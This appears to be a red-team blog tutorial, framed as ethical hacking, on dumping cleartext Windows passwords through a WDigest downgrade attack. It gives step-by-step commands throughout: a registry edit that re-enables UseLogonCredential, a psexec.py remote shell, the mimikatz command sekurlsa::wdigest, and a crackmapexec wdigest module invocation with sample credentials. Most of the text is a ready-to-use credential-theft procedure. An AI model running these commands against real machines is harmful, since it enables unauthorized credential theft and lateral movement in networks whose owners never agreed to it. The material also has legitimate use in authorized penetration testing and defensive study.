Select Page

How To Dump Windows Passwords Using WDIGEST Downgrade Attack

by | Feb 10, 2021 | Crackmapexec, Redteam

internet screen security protection

By default wdigest is disabled on Windows 10, but not removed. You can enable it with a registry change. This is a short and sweet tutorial on how to dump Windows passwords by exploiting wdigest in a wdigest downgrade attack. I demonstrate how to exploit the challenge-response protocol wdigest to extract cleartext credentials through mimikatz and by using the crackmapexec module.

The attack involves making a registry change to the WDigest setting in the local group policy settings on the target. From an attacker perspective making an unauthorized registry change requires local admin permissions on the target.

exploiting wdigest in a wdigest downgrade attack.

As a local administrator I am going to make one little registry change to make this attack possible.

I am going to use this command to add the registry key 1 to the Windows registry for wdigest c:\Users\beh\Downloads\mimikatz_trunk\x64>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1.

Then I use mimikatz for this simple example.

Here are the steps to exploit wdigest to dump user credentials from memory:

  1. Open a shell on the BEHWIN10 target using Impacket’s psexec.py (must be admin level creds). python3 psexec.py {user}:{pass}@target
  2. Use this command to edit the registry key that disables wdigest by default on Windows 10: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
  3. Logon as a new user, here I am using wa-kennyp.
  4. With your shell still open run sekurlsa::wdigest after using mimikatz to start Mimikatz.

Using Crackmapexec To Exploit Wdigest

First if you don't know how to install the crackmapexec Docker image, do that. It is so much easier than trying to install from source or using one of the releases, because of the many dependencies. Check the wiki to see all the options.

Once you have installed Docker on Kali Linux, then pull the crackmapexec image from Docker Hub, docker pull byt3bl33d3r/crackmapexec this will kick off the installation.

Now start a new container from the newly acquired image.

kali@kali:~$ docker run -it --entrypoint=/bin/sh --name crackmapexec -v ~/.cme:/root/.cme byt3bl33d3r/crackmapexec to start using the crackmapexec Docker container.

docker run -it tells Docker I want to open an interactive tty session on the running container. It's like I just remoted into it. --entrypoint=/bin/sh overrides the entrypoint set for the image and it just means run this command (/bin/sh or /bin/bash). -v stands for volume mount where ~/.cme (/root/cme) is the volume name.You can confirm the volume details by using the command docker inspect crackmapexec. The second field is the path where the file or directory are mounted in the container. Finally the byt3bl33d3r/crackmapexec is the image name. In other words, docker run -it --entrypoint={command} --name {give the container a name} -v {volume name}:{mount location}

You may know that crackmapexec has modules built-in for various tasks. You can list the possible options using python3 crackmapexec.py smb -L

Finally move to the /usr/src/crackmapexec/cme directory and use python3 crackmapexec.py smb 10.0.0.64 -u 'wa-kennyp' -p 'Secret1' -M wdigest -o ACTION=enable to use the wdigest module remotely on the target.

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


error: